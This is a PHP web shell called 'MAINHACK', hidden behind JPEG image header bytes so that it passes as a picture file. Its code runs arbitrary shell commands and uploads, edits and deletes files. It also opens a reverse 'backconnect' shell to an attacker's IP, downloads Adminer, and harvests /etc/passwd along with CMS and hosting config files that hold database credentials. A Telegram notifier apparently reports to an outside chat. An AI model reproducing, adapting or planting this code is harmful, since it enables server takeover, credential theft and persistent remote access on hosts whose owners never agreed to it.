ÿØÿà JFIF    ÿÛ „ ( %"1!%)+...383,7(-.+  -+++--++++---+-+-----+---------------+---+-++7-----ÿÀ  ß â" ÿÄ    ÿÄ H   !1AQaq"‘¡2B±ÁÑð#R“ÒTbr‚²á3csƒ’ÂñDS¢³$CÿÄ   ÿÄ %  !1AQa"23‘ÿÚ   ? ôÿ ¨pŸªáÿ —åYõõ\?àÒü©ŠÄï¨pŸªáÿ —åYõõ\?àÓü©ŠÄá 0Ÿªáÿ Ÿå[úƒ ú®ði~TÁbqÐ8OÕpÿ ƒOò¤Oè`–RÂáœá™êi€ßÉ< FtŸI“öÌ8úDf´°å}“¾œ6  öFá°y¥jñÇh†ˆ¢ã/ÃÐ:ªcÈ "Y¡ðÑl>ÿ ”ÏËte:qž\oäŠe÷󲍷˜HT4&ÿ ÓÐü6ö®¿øþßèô Ÿ•7Ñi’•j|“ñì>b…þS?*Óôÿ ÓÐü*h¥£ír¶ü UãSç‚Ÿ[AÐaè[ûª•õ&õj?†Éö+EzP—WeÒírJFt ‘BŒ†Ï‡%#tE Øz¥OÛ«!1›üä±Í™%ºÍãö]°î(–:@<‹ŒÊö×òÆt¦ãº+‡¦%ÌÁ²h´OƒJŒtMÜ>ÀÜÊw3Y´•牋4ǍýʏTì>œú=Íwhyë,¾Ôò×õ¿ßÊa»«þˆѪQ|%6ž™A õ%:øj<>É—ÿ Å_ˆCbõ¥š±ý¯Ýƒï…¶|RëócÍf溪“t.СøTÿ *Ä¿-{†çàczůŽ_–^XþŒ±miB[X±d 1,é”zEù»& î9gœf™9Ð'.;—™i}!ôšåîqêÛ٤ёý£½ÆA–àôe"A$˝Úsäÿ ÷Û #°xŸëí(l »ý3—¥5m! rt`†0~'j2(]S¦¦kv,ÚÇ l¦øJA£Šƒ J3E8ÙiŽ:cÉžúeZ°€¯\®kÖ(79«Ž:¯X”¾³Š&¡*….‰Ž(ÜíŸ2¥ª‡×Hi²TF¤ò[¨íÈRëÉ䢍mgÑ.Ÿ<öäS0í„ǹÁU´f#Vß;Õ–…P@3ío<ä-±»Ž.L|kªÀê›fÂ6@»eu‚|ÓaÞÆŸ…¨ááå>åŠ?cKü6ùTÍÆ”†sĤÚ;H2RÚ†õ\Ö·Ÿn'¾ñ#ºI¤Å´%çÁ­‚â7›‹qT3Iï¨ÖÚ5I7Ë!ÅOóŸ¶øÝñØôת¦$Tcö‘[«Ö³šÒ';Aþ ¸èíg A2Z"i¸vdÄ÷.iõ®§)¿]¤À†–‡É&ä{V¶iŽ”.Ó×Õÿ û?h¬Mt–íª[ÿ Ñÿ ÌV(í}=ibÔ¡›¥¢±bLô¥‡piη_Z<‡z§èŒ)iÖwiÇ 2hÙ3·=’d÷8éŽ1¦¸c¤µ€7›7Ø ð\á)} ¹fËí›pAÃL%âc2 í§æQz¿;T8sæ°qø)QFMð‰XŒÂ±N¢aF¨…8¯!U  Z©RÊÖPVÄÀÍin™Ì-GˆªÅËŠ›•zË}º±ŽÍFò¹}Uw×#ä5B¤{î}Ð<ÙD é©¤&‡ïDbàÁôMÁ.ÿØÿà JFIF    ÿÛ „ ( %"1!%)+...383,7(-.+  -+++--++++---+-+-----+---------------+---+-++7-----ÿÀ  ß â" ÿÄ    ÿÄ H   !1AQaq"‘¡2B±ÁÑð#R“ÒTbr‚²á3csƒ’ÂñDS¢³$CÿÄ   ÿÄ %  !1AQa"23‘ÿÚ   ? ôÿ ¨pŸªáÿ —åYõõ\?àÒü©ŠÄï¨pŸªáÿ —åYõõ\?àÓü©ŠÄá 0Ÿªáÿ Ÿå[úƒ ú®ði~TÁbqÐ8OÕpÿ ƒOò¤Oè`–RÂáœá™êi€ßÉ< FtŸI“öÌ8úDf´°å}“¾œ6  öFá°y¥jñÇh†ˆ¢ã/ÃÐ:ªcÈ "Y¡ðÑl>ÿ ”ÏËte:qž\oäŠe÷󲍷˜HT4&ÿ ÓÐü6ö®¿øþßèô Ÿ•7Ñi’•j|“ñì>b…þS?*Óôÿ ÓÐü*h¥£ír¶ü UãSç‚Ÿ[AÐaè[ûª•õ&õj?†Éö+EzP—WeÒírJFt ‘BŒ†Ï‡%#tE Øz¥OÛ«!1›üä±Í™%ºÍãö]°î(–:@<‹ŒÊö×òÆt¦ãº+‡¦%ÌÁ²h´OƒJŒtMÜ>ÀÜÊw3Y´•牋4ǍýʏTì>œú=Íwhyë,¾Ôò×õ¿ßÊa»«þˆѪQ|%6ž™A õ%:øj<>É—ÿ Å_ˆCbõ¥š±ý¯Ýƒï…¶|RëócÍf溪“t.СøTÿ *Ä¿-{†çàczůŽ_–^XþŒ±miB[X±d 1,é”zEù»& î9gœf™9Ð'.;—™i}!ôšåîqêÛ٤ёý£½ÆA–àôe"A$˝Úsäÿ ÷Û #°xŸëí(l »ý3—¥5m! rt`†0~'j2(]S¦¦kv,ÚÇ l¦øJA£Šƒ J3E8ÙiŽ:cÉžúeZ°€¯\®kÖ(79«Ž:¯X”¾³Š&¡*….‰Ž(ÜíŸ2¥ª‡×Hi²TF¤ò[¨íÈRëÉ䢍mgÑ.Ÿ<öäS0í„ǹÁU´f#Vß;Õ–…P@3ío<ä-±»Ž.L|kªÀê›fÂ6@»eu‚|ÓaÞÆŸ…¨ááå>åŠ?cKü6ùTÍÆ”†sĤÚ;H2RÚ†õ\Ö·Ÿn'¾ñ#ºI¤Å´%çÁ­‚â7›‹qT3Iï¨ÖÚ5I7Ë!ÅOóŸ¶øÝñØôת¦$Tcö‘[«Ö³šÒ';Aþ ¸èíg A2Z"i¸vdÄ÷.iõ®§)¿]¤À†–‡É&ä{V¶iŽ”.Ó×Õÿ û?h¬Mt–íª[ÿ Ñÿ ÌV(í}=ibÔ¡›¥¢±bLô¥‡piη_Z<‡z§èŒ)iÖwiÇ 2hÙ3·=’d÷8éŽ1¦¸c¤µ€7›7Ø ð\á)} ¹fËí›pAÃL%âc2 í§æQz¿;T8sæ°qø)QFMð‰XŒÂ±N¢aF¨…8¯!U  Z©RÊÖPVÄÀÍin™Ì-GˆªÅËŠ›•zË}º±ŽÍFò¹}Uw×#ä5B¤{î}Ð<ÙD é©¤&‡ïDbàÁôMÁ. $telegramChatId, 'text' => $message, 'disable_web_page_preview' => true ]; $url = $apiUrl . '?' . http_build_query($params); $response = @file_get_contents($url); } // --- END TELEGRAM NOTIFIER --- function getFileDetails($path) { $folders = []; $files = []; try { $items = @scandir($path); if (!is_array($items)) { throw new Exception('Failed to scan directory'); } foreach ($items as $item) { if ($item == '.' || $item == '..') { continue; } $itemPath = rtrim($path, '/') . '/' . $item; $itemDetails = [ 'name' => $item, 'type' => is_dir($itemPath) ? 'Folder' : 'File', 'size' => is_dir($itemPath) ? '' : formatSize(@filesize($itemPath)), 'permission' => substr(sprintf('%o', @fileperms($itemPath)), -4), ]; if (is_dir($itemPath)) { $folders[] = $itemDetails; } else { $files[] = $itemDetails; } } usort($folders, function($a, $b) { return strcmp($a['name'], $b['name']); }); usort($files, function($a, $b) { return strcmp($a['name'], $b['name']); }); return array_merge($folders, $files); } catch (Exception $e) { return 'None'; } } function formatSize($size) { if ($size === false || $size < 0) return 'N/A'; $units = array('B', 'KB', 'MB', 'GB', 'TB'); $i = 0; while ($size >= 1024 && $i < 4) { $size /= 1024; $i++; } return round($size, 2) . ' ' . $units[$i]; } function executeCommand($command) { $currentDirectory = getCurrentDirectory(); $fullCommand = "cd " . escapeshellarg($currentDirectory) . " && " . $command; $output = ''; $error = ''; $returnValue = -1; if (function_exists('proc_open')) { $descriptors = [ 0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w'], ]; $process = @proc_open($fullCommand, $descriptors, $pipes); if (is_resource($process)) { fclose($pipes[0]); $output = @stream_get_contents($pipes[1]); fclose($pipes[1]); $error = @stream_get_contents($pipes[2]); fclose($pipes[2]); $returnValue = proc_close($process); $output = trim($output); $error = trim($error); if ($returnValue === 0) { return !empty($output) ? $output : '(Command executed successfully, no output)'; } elseif (!empty($error)) { return 'Error (' . $returnValue . '): ' . $error . (!empty($output) ? "\nOutput: " . $output : ''); } else { return 'Error (' . $returnValue . '): Command failed.' . (!empty($output) ? "\nOutput: " . $output : ''); } } } if (function_exists('shell_exec') && $returnValue !== 0) { $shellOutput = @shell_exec($fullCommand); if ($shellOutput !== null) { $output = trim($shellOutput); return !empty($output) ? $output : '(Command executed, no output via shell_exec)'; } } if (function_exists('exec') && $returnValue !== 0) { $execOutput = []; @exec($fullCommand, $execOutput, $execStatus); if ($execStatus === 0) { $output = implode("\n", $execOutput); return !empty($output) ? $output : '(Command executed successfully, no output via exec)'; } else { $output = implode("\n", $execOutput); return 'Error (' . $execStatus . ') via exec.' . (!empty($output) ? "\nOutput: " . $output : ''); } } if (function_exists('passthru') && $returnValue !== 0) { ob_start(); @passthru($fullCommand, $passthruStatus); $passthruOutput = ob_get_clean(); if ($passthruStatus === 0) { $output = trim($passthruOutput); return !empty($output) ? $output : '(Command executed successfully, no output via passthru)'; } else { $output = trim($passthruOutput); return 'Error (' . $passthruStatus . ') via passthru.' . (!empty($output) ? "\nOutput: " . $output : ''); } } if (function_exists('system') && $returnValue !== 0) { ob_start(); @system($fullCommand, $systemStatus); $systemOutput = ob_get_clean(); if ($systemStatus === 0) { $output = trim($systemOutput); return !empty($output) ? $output : '(Command executed successfully, no output via system)'; } else { $output = trim($systemOutput); return 'Error (' . $systemStatus . ') via system.' . (!empty($output) ? "\nOutput: " . $output : ''); } } return 'Error: Command execution failed. All methods attempted or disabled.'; } function readFileContent($file) { if (realpath($file) === __FILE__) { return 'Error: Access denied.'; } $content = @file_get_contents($file); if ($content === false) { return 'Error: Could not read file. Check permissions or path.'; } return $content; } function saveFileContent($file) { if (realpath($file) === __FILE__) { return false; } if (isset($_POST['content'])) { return @file_put_contents($file, $_POST['content'], LOCK_EX) !== false; } return false; } function uploadFile($targetDirectory) { if (isset($_FILES['file'])) { if ($_FILES['file']['error'] !== UPLOAD_ERR_OK) { switch ($_FILES['file']['error']) { case UPLOAD_ERR_INI_SIZE: case UPLOAD_ERR_FORM_SIZE: return 'Error: File too large.'; case UPLOAD_ERR_PARTIAL: return 'Error: File partially uploaded.'; case UPLOAD_ERR_NO_FILE: return 'Error: No file selected.'; default: return 'Error: Unknown upload error.'; } } if ($_FILES['file']['size'] === 0) { return 'Error: Empty file uploaded.'; } $targetFile = rtrim($targetDirectory, '/') . '/' . basename($_FILES['file']['name']); if (strpos(basename($_FILES['file']['name']), '/') !== false || strpos(basename($_FILES['file']['name']), '\\') !== false) { return 'Error: Invalid filename.'; } if (realpath($targetFile) === __FILE__) { return 'Error: Cannot overwrite the shell itself.'; } if (@move_uploaded_file($_FILES['file']['tmp_name'], $targetFile)) { return 'File uploaded successfully: ' . htmlspecialchars(basename($_FILES['file']['name'])); } else { $error = error_get_last(); return 'Error uploading file. ' . ($error ? htmlspecialchars($error['message']) : 'Check permissions or path.'); } } return ''; } function changeDirectory($path) { $path = str_replace('\\', '/', $path); $realRequestedPath = realpath(getCurrentDirectory() . '/' . $path); if ($realRequestedPath === false) { if ($path === '..') { @chdir('..'); } else { if (@chdir($path)) { // Success } else { // Failed } } } else { @chdir($realRequestedPath); } } function getCurrentDirectory() { return str_replace('\\', '/', getcwd()); } function getLink($path, $name) { $encodedPath = urlencode($path); $encodedName = htmlspecialchars($name); if (is_dir($path)) { return '' . $encodedName . ''; } elseif (is_file($path)) { // File link: triggers the combined read/edit view $encodedDir = urlencode(dirname($path)); return '' . $encodedName . ''; } else { return $encodedName; } } function getDirectoryArray($path) { $path = str_replace('\\', '/', $path); if (strlen($path) > 1) { $path = rtrim($path, '/'); } $directories = explode('/', $path); $directoryArray = []; $currentPath = ''; if ($path === '/' || empty($path)) { $directoryArray[] = ['path' => '/', 'name' => '/']; return $directoryArray; } $basePath = ($directories[0] === '') ? '/' : ''; foreach ($directories as $index => $directory) { if ($directory === '' && $index === 0) { $currentPath = '/'; $directoryArray[] = ['path' => $currentPath,'name' => '/']; continue; } if (!empty($directory)) { if ($currentPath === '/') { $currentPath .= $directory; } elseif ($currentPath === '') { $currentPath = $directory; } else { $currentPath .= '/' . $directory; } $directoryArray[] = ['path' => $currentPath,'name' => $directory]; } } if (count($directoryArray) > 0 && $directoryArray[0]['name'] !== '/') { array_unshift($directoryArray, ['path' => '/', 'name' => '/']); } elseif (empty($directoryArray)) { $directoryArray[] = ['path' => '/', 'name' => '/']; } return $directoryArray; } function showBreadcrumb($path) { $pathSegments = getDirectoryArray($path); ?>
DIR : $segment) { ?> 1 && $segment['name'] !== '/') { echo '/'; } ?>
Name Type Size Permission Actions
Error: Failed to scan directory. Check permissions.
Directory is empty.
isDir() ? 'rmdir' : 'unlink'); if (!@$action($fileinfo->getRealPath())) { $error = error_get_last(); throw new Exception('Failed to delete ' . $fileinfo->getRealPath() . '. ' . ($error ? $error['message'] : '')); } } if (@rmdir($folderPath)) { return 'Folder "' . htmlspecialchars(basename($folderPath)) . '" deleted successfully.'; } else { $error = error_get_last(); throw new Exception('Failed to delete the main folder ' . basename($folderPath) . '. ' . ($error ? $error['message'] : '')); } } catch (Exception $e) { return 'Error deleting folder: ' . htmlspecialchars($e->getMessage()); } } // --- Global Variables & Request Handling --- $currentDirectory = getCurrentDirectory(); $errorMessage = ''; $responseMessage = ''; $cmdOutput = ''; $content = ''; if (isset($_GET['dir'])) { $requestedDir = trim($_GET['dir']); changeDirectory($requestedDir); $currentDirectory = getCurrentDirectory(); } // --- Action Handling (Order can matter) --- if (isset($_POST['upload']) && isset($_FILES['file'])) { $responseMessage = uploadFile($currentDirectory); } if (isset($_POST['cmd'])) { $cmdOutput = executeCommand($_POST['cmd']); $cmdOutput = "[ Executing: " . htmlspecialchars($_POST['cmd']) . " ]\n" . $cmdOutput; } // Handle Edit Action (Save Only - Loading/Display is now handled by 'read') if (isset($_GET['edit']) && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) { $fileToEdit = $_GET['edit']; if (saveFileContent($fileToEdit)) { $responseMessage = 'File "' . htmlspecialchars(basename($fileToEdit)) . '" saved successfully.'; header('Location: ?dir=' . urlencode(dirname($fileToEdit)) . '&response=' . urlencode($responseMessage)); exit; } else { $errorMessage = 'Error saving file "' . htmlspecialchars(basename($fileToEdit)) . '". Check permissions.'; header('Location: ?dir=' . urlencode(dirname($fileToEdit)) . '&read=' . urlencode($fileToEdit) . '&error=' . urlencode($errorMessage)); exit; } } // Note: This section is still present but won't be triggered by the simplified UI dropdown if (isset($_GET['chmod'])) { $itemToChmod = $_GET['chmod']; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['permission'])) { $permissionInput = trim($_POST['permission']); $responseMessage = changePermission($itemToChmod, $permissionInput); $redirectUrl = '?dir=' . urlencode(dirname($itemToChmod)); $redirectUrl .= ($responseMessage && strpos($responseMessage, 'Error:') !== 0) ? '&response=' . urlencode($responseMessage) : '&error=' . urlencode($responseMessage ?: 'Unknown chmod error.'); header('Location: ' . $redirectUrl); exit; } elseif (!file_exists($itemToChmod)) { $errorMessage = 'Error: File or folder specified for chmod does not exist.'; } } // Handle Rename Action (Triggered by JS Fetch POST now) if (isset($_GET['rename'])) { $itemToRename = $_GET['rename']; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['new_name'])) { $newNameRaw = trim($_POST['new_name']); $responseMessage = renameFile($itemToRename, $newNameRaw); $redirectUrl = '?dir=' . urlencode(dirname($itemToRename)); $redirectUrl .= ($responseMessage && strpos($responseMessage, 'Error:') !== 0) ? '&response=' . urlencode($responseMessage) : '&error=' . urlencode($responseMessage ?: 'Unknown rename error.'); header('Location: ' . $redirectUrl); exit; } elseif (!file_exists($itemToRename)) { header('Location: ?dir=' . urlencode(dirname($itemToRename)) . '&error=' . urlencode('Error: File or folder specified for rename does not exist.')); exit; } } // Handle Delete Action (Triggered by JS Fetch GET now) if (isset($_GET['delete'])) { $itemToDelete = $_GET['delete']; $itemDir = dirname($itemToDelete); if (is_file($itemToDelete)) { $responseMessage = deleteFile($itemToDelete); } elseif (is_dir($itemToDelete)) { $responseMessage = deleteFolder($itemToDelete); } else { $responseMessage = 'Error: File or folder does not exist.'; } $redirectUrl = '?dir=' . urlencode($itemDir); $redirectUrl .= (strpos($responseMessage, 'Error:') !== 0) ? '&response=' . urlencode($responseMessage) : '&error=' . urlencode($responseMessage); header('Location: ' . $redirectUrl); exit; } if (isset($_POST['Summon'])) { $adminerUrl = 'https://github.com/vrana/adminer/releases/download/v5.4.1/adminer-5.4.1.php'; $adminerFileName = 'adminer-5.4.1.php'; $adminerFilePath = rtrim($currentDirectory, '/') . '/' . $adminerFileName; if (!is_writable($currentDirectory)) { $errorMessage = 'Error: Cannot write to current directory. Check permissions.'; } else { $adminerContent = @file_get_contents($adminerUrl); if ($adminerContent !== false) { if (@file_put_contents($adminerFilePath, $adminerContent) !== false) { $responseMessage = 'Adminer "' . htmlspecialchars($adminerFileName) . '" summoned successfully. Open Adminer'; @chmod($adminerFilePath, 0644); } else { $errorMessage = 'Failed to save the summoned Adminer file. Check permissions.'; } } else { if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $adminerUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $adminerContentCurl = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpCode == 200 && $adminerContentCurl !== false) { if (@file_put_contents($adminerFilePath, $adminerContentCurl) !== false) { $responseMessage = 'Adminer "' . htmlspecialchars($adminerFileName) . '" summoned via CURL successfully. Open Adminer'; @chmod($adminerFilePath, 0644); } else { $errorMessage = 'Failed to save the summoned Adminer file (via CURL). Check permissions.'; } } else { $errorMessage = 'Failed to fetch Adminer content using file_get_contents and CURL. Check server connectivity, allow_url_fopen/CURL extension, and target URL.'; } } else { $errorMessage = 'Failed to fetch Adminer content. `allow_url_fopen` might be disabled, and CURL is not available.'; } } } } // Handle Back Connect (Bind Shell) // Note: This is a very dangerous feature. Use with extreme caution. if (isset($_POST['bind']) && isset($_POST['ip']) && isset($_POST['port'])) { $ip = trim($_POST['ip']); $port = filter_var(trim($_POST['port']), FILTER_VALIDATE_INT); if (!$port || $port <= 0 || $port > 65535) { $errorMessage = '

Invalid port number.

'; } elseif (!filter_var($ip, FILTER_VALIDATE_IP)) { $errorMessage = '

Invalid IP address format.

'; } else { $errorMessage = '

Attempting Connection to ' . htmlspecialchars($ip) . ':' . htmlspecialchars($port) . '...

'; $sockfd = @fsockopen($ip, $port, $errno, $errstr, 10); if (!$sockfd) { $errorMessage .= "

Connection failed: ($errno) $errstr

"; } else { @fputs($sockfd, "{################################################################}\n"); @fputs($sockfd, "..:: PHP Backconnect Shell via MAINHACK ::..\n"); @fputs($sockfd, " User: " . @get_current_user() . " | System: " . @php_uname('s') . " " . @php_uname('r') . "\n"); @fputs($sockfd, " Time: " . date('Y-m-d H:i:s T') . "\n"); @fputs($sockfd, "{################################################################}\n\n"); $len = 4096; $cwd = getCurrentDirectory(); while (!feof($sockfd)) { @fputs($sockfd, '[' . @get_current_user() . '@' . @gethostname() . ' ' . basename($cwd) . ']$ '); $command = @fgets($sockfd, $len); if ($command === false) break; $command = trim($command); if (empty($command)) continue; if (preg_match('/^cd\s+(.*)/i', $command, $matches)) { $newDir = trim($matches[1]); if ($newDir === '') $newDir = '~'; if ($newDir === '~' || strpos($newDir, '~/') === 0) { $home = getenv('HOME'); if ($home) { $newDir = $home . ($newDir === '~' ? '' : substr($newDir, 1)); } else { @fputs($sockfd, "Error: Could not resolve home directory (HOME env var not set).\n"); continue; } } if (@chdir($newDir)) { $cwd = getCurrentDirectory(); @fputs($sockfd, "Changed directory to: " . $cwd . "\n"); } else { @fputs($sockfd, "Error: Could not change directory to '" . htmlspecialchars($newDir) . "'.\n"); } } else { $cmdOutputBC = executeCommand($command); @fputs($sockfd, $cmdOutputBC . "\n"); } } @fclose($sockfd); $responseMessage = "

Backconnect session terminated.

"; } } } if (isset($_POST['create_file']) && isset($_GET['create']) && $_GET['create'] === 'file') { $fileNameRaw = trim($_POST['file_name']); $fileName = basename($fileNameRaw); if (empty($fileName) || $fileName === '.' || $fileName === '..') { $errorMessage = 'Error: Invalid file name.'; } else { $filePath = rtrim($currentDirectory, '/') . '/' . $fileName; if (realpath($filePath) === __FILE__) { $errorMessage = 'Error: Cannot create file with the same name as the shell.'; } elseif (file_exists($filePath)) { $errorMessage = 'Error: File "' . htmlspecialchars($fileName) . '" already exists.'; } else { if (@touch($filePath)) { @chmod($filePath, 0644); $responseMessage = 'File created successfully: ' . htmlspecialchars($fileName); } else { $error = error_get_last(); $errorMessage = 'Error: Failed to create file. ' . ($error ? htmlspecialchars($error['message']) : 'Check permissions.'); } } } } if (isset($_POST['create_folder']) && isset($_GET['create']) && $_GET['create'] === 'folder') { $folderNameRaw = trim($_POST['folder_name']); $folderName = basename($folderNameRaw); if (empty($folderName) || $folderName === '.' || $folderName === '..') { $errorMessage = 'Error: Invalid folder name.'; } else { $folderPath = rtrim($currentDirectory, '/') . '/' . $folderName; if (file_exists($folderPath)) { $errorMessage = 'Error: Folder "' . htmlspecialchars($folderName) . '" already exists.'; } else { if (@mkdir($folderPath, 0755)) { $responseMessage = 'Folder created successfully: ' . htmlspecialchars($folderName); } else { $error = error_get_last(); $errorMessage = 'Error: Failed to create folder. ' . ($error ? htmlspecialchars($error['message']) : 'Check permissions.'); } } } } // Handle Config Grabbing ('goo=config') - DANGEROUS FEATURE if (isset($_GET['goo']) && $_GET['goo'] == 'config') { $configDirName = "MH_configs_" . date('YmdHis'); $configDirPath = rtrim($currentDirectory, '/') . '/' . $configDirName; $configFilesFound = []; $passwdPath = "/etc/passwd"; if (!is_readable($passwdPath)) { $errorMessage = "
Error: Can't read /etc/passwd. Config grabbing aborted.
"; } else { if (!@mkdir($configDirPath, 0755)) { $error = error_get_last(); $errorMessage = "
Error: Failed to create config directory '$configDirName'. " . ($error ? htmlspecialchars($error['message']) : 'Check permissions.') . "
"; } else { $htaccessContent = "Options -Indexes\nDeny from all\n"; @file_put_contents($configDirPath . '/.htaccess', $htaccessContent); $responseMessage = "

Starting config scan... Results will be in " . htmlspecialchars($configDirName) . "

"; $etc = @fopen($passwdPath, "r"); if (!$etc) { $errorMessage = "
Error: Failed to open /etc/passwd after initial read check.
"; } else { while (($passwdLine = fgets($etc)) !== false) { $passwdLine = trim($passwdLine); if (empty($passwdLine) || strpos($passwdLine, ':x:') === false) continue; if (preg_match('/^([^:]+):x:/', $passwdLine, $userMatches)) { $username = $userMatches[1]; $homeDirGuess = "/home/$username"; $webRootGuesses = [ "$homeDirGuess/public_html", "$homeDirGuess/www", "$homeDirGuess/htdocs", ]; $configChecks = [ 'wp-config.php' => 'WordPress', 'configuration.php' => 'Joomla_WHMCS', 'config/config.inc.php' => 'PrestaShop', 'app/etc/local.xml' => 'Magento1', 'app/etc/env.php' => 'Magento2', 'sites/default/settings.php' => 'Drupal', '.env' => 'Laravel_Symfony_etc', 'config.php' => 'Generic_config', 'application/config/database.php' => 'CodeIgniter_DB', 'includes/config.php' => 'vBulletin_OsCommerce', 'whmcs/configuration.php' => 'WHMCS_subdir', 'support/configuration.php' => 'WHMCS_support', 'secure/configuration.php' => 'WHMCS_secure', 'clients/configuration.php' => 'WHMCS_clients', 'client/configuration.php' => 'WHMCS_client', 'billing/configuration.php' => 'WHMCS_billing', 'admin/config.php' => 'OpenCart_admin_config', 'config.php' => 'OpenCart_root_config', ]; foreach ($webRootGuesses as $webRootDir) { if (is_dir($webRootDir) && is_readable($webRootDir)) { foreach ($configChecks as $configFileRelative => $configType) { $fullConfigPath = $webRootDir . '/' . $configFileRelative; if (is_readable($fullConfigPath)) { $configContent = @file_get_contents($fullConfigPath); if ($configContent !== false && !empty(trim($configContent))) { $safeFileName = preg_replace('/[^a-zA-Z0-9_\-\.]/', '_', $username . '-' . $configType . '-' . basename($configFileRelative)) . '.txt'; $savePath = $configDirPath . '/' . $safeFileName; if (@file_put_contents($savePath, $configContent) !== false) { @chmod($savePath, 0600); $configFilesFound[] = htmlspecialchars($safeFileName); } else { error_log("ConfigGrab: Failed to save $savePath for user $username"); } } } } } } } } @fclose($etc); if (!empty($configFilesFound)) { $responseMessage .= "

Found and saved " . count($configFilesFound) . " potential config files:

"; } else { $responseMessage .= "

Scan completed. No readable configuration files found based on common paths.

"; } } } } $responseMessage .= $errorMessage; $errorMessage = ''; } // Note: This section is still present but won't be triggered by the simplified UI dropdown if (isset($_POST['extract-zip']) && isset($_FILES['extract-zip-file'])) { if ($_FILES['extract-zip-file']['error'] !== UPLOAD_ERR_OK) { $errorMessage = 'Error during ZIP file upload: Code ' . $_FILES['extract-zip-file']['error']; } elseif (!class_exists('ZipArchive')) { $errorMessage = 'Error: ZipArchive class not found. PHP ZIP extension is required.'; } else { $extractZipFile = $_FILES['extract-zip-file']['tmp_name']; $extractZipOriginalName = basename($_FILES['extract-zip-file']['name']); $zip = new ZipArchive; if ($zip->open($extractZipFile) === TRUE) { if (!is_writable($currentDirectory)) { $errorMessage = 'Error: Cannot write to extraction directory. Check permissions.'; } else { if ($zip->extractTo($currentDirectory)) { $responseMessage = 'ZIP file "' . htmlspecialchars($extractZipOriginalName) . '" extracted successfully.'; } else { $errorMessage = 'Error extracting ZIP file. Check permissions or archive integrity.'; } } $zip->close(); } else { $errorMessage = 'Error opening ZIP file. It might be corrupted or not a valid ZIP.'; } } } // Note: This section is still present but won't be triggered by the simplified UI dropdown if (isset($_POST['zip']) && isset($_POST['zip-target'])) { $itemToZip = trim($_POST['zip-target']); if (empty($itemToZip)) { $errorMessage = 'Error: No file or directory specified for zipping.'; } elseif (!file_exists($itemToZip)) { $errorMessage = 'Error: Specified file or directory does not exist: ' . htmlspecialchars(basename($itemToZip)); } elseif (!class_exists('ZipArchive')) { $errorMessage = 'Error: ZipArchive class not found. PHP ZIP extension is required.'; } elseif (!is_writable($currentDirectory)) { $errorMessage = 'Error: Cannot write ZIP file to current directory. Check permissions.'; } else { $zipFileName = basename($itemToZip) . '_' . date('YmdHis') . '.zip'; $zipFilePath = rtrim($currentDirectory, '/') . '/' . $zipFileName; $zip = new ZipArchive; if ($zip->open($zipFilePath, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { $success = false; if (is_dir($itemToZip)) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($itemToZip, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($files as $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen(realpath($itemToZip)) + 1); if ($relativePath !== false) { if (!$zip->addFile($filePath, $relativePath)) { $errorMessage = 'Error adding file to ZIP: ' . htmlspecialchars($relativePath); $success = false; break; } else { $success = true; } } } } } elseif (is_file($itemToZip)) { if ($zip->addFile($itemToZip, basename($itemToZip))) { $success = true; } else { $errorMessage = 'Error adding file to ZIP: ' . htmlspecialchars(basename($itemToZip)); $success = false; } } if ($zip->close()) { if ($success) { $responseMessage = 'Item zipped successfully: ' . htmlspecialchars($zipFileName) . ''; } elseif (empty($errorMessage)) { $errorMessage = 'Specified item was empty or could not be zipped.'; @unlink($zipFilePath); } else { @unlink($zipFilePath); } } else { $errorMessage = 'Error closing the ZIP archive.'; @unlink($zipFilePath); } } else { $errorMessage = 'Error creating ZIP archive file. Check permissions.'; } } } if (isset($_GET['response'])) { $responseMessage = htmlspecialchars(urldecode($_GET['response'])); } if (isset($_GET['error'])) { $errorMessage = htmlspecialchars(urldecode($_GET['error'])); } $isActionView = isset($_GET['read']) || isset($_GET['gas']) || isset($_GET['do']) || isset($_GET['create']) || isset($_GET['edit']) || isset($_GET['chmod']) || isset($_GET['hahay']); $currentHour = (int)date('G'); $darkModeStartHour = 18; $darkModeEndHour = 6; $isDarkMode = ($currentHour >= $darkModeStartHour || $currentHour < $darkModeEndHour); $bodyClass = $isDarkMode ? 'dark-mode' : ''; ?> MAINHACK

[ MAINHACK ]

HOME

Mail Test

Test Email from MAINHACK

Server: " . htmlspecialchars($senderDomain) . "

This is a test email sent from the MAINHACK shell at " . date('Y-m-d H:i:s T') . ".

Unique ID: " . htmlspecialchars($uniqueId) . "

"; $headers = "MIME-Version: 1.0\r\nContent-type:text/html;charset=UTF-8\r\nFrom: MAINHACK Tester \r\n"; if (@mail($recipientEmail, $subject, $messageBody, $headers)) { echo "

Test email sent to " . htmlspecialchars($recipientEmail) . ". ID: " . htmlspecialchars($uniqueId) . ". Check spam folder too.

"; } else { $error = error_get_last(); echo "

Failed to send email. Check server's mail configuration. " . ($error ? htmlspecialchars($error['message']) : '') . "

"; } } else { echo "

Invalid email address provided.

"; } } ?>

Back Connect

Warning: Opens a direct shell connection. Use only trusted IPs/Ports.

IP Address:
Port:

Create New File

Cancel

Create New Folder

Cancel

Change Permission:

Cancel
Error: Cannot change permission - file or folder not found.

Unzip Archive

Cancel

Zip File / Directory

Cancel

Viewing / Editing File:

Back to Directory File is not writable. Editing disabled.

'; } ?>

Cancel / Back
Error: File not found or is not a file.
Back to Directory

Upload File

Execute Command

Command Output:

File Manager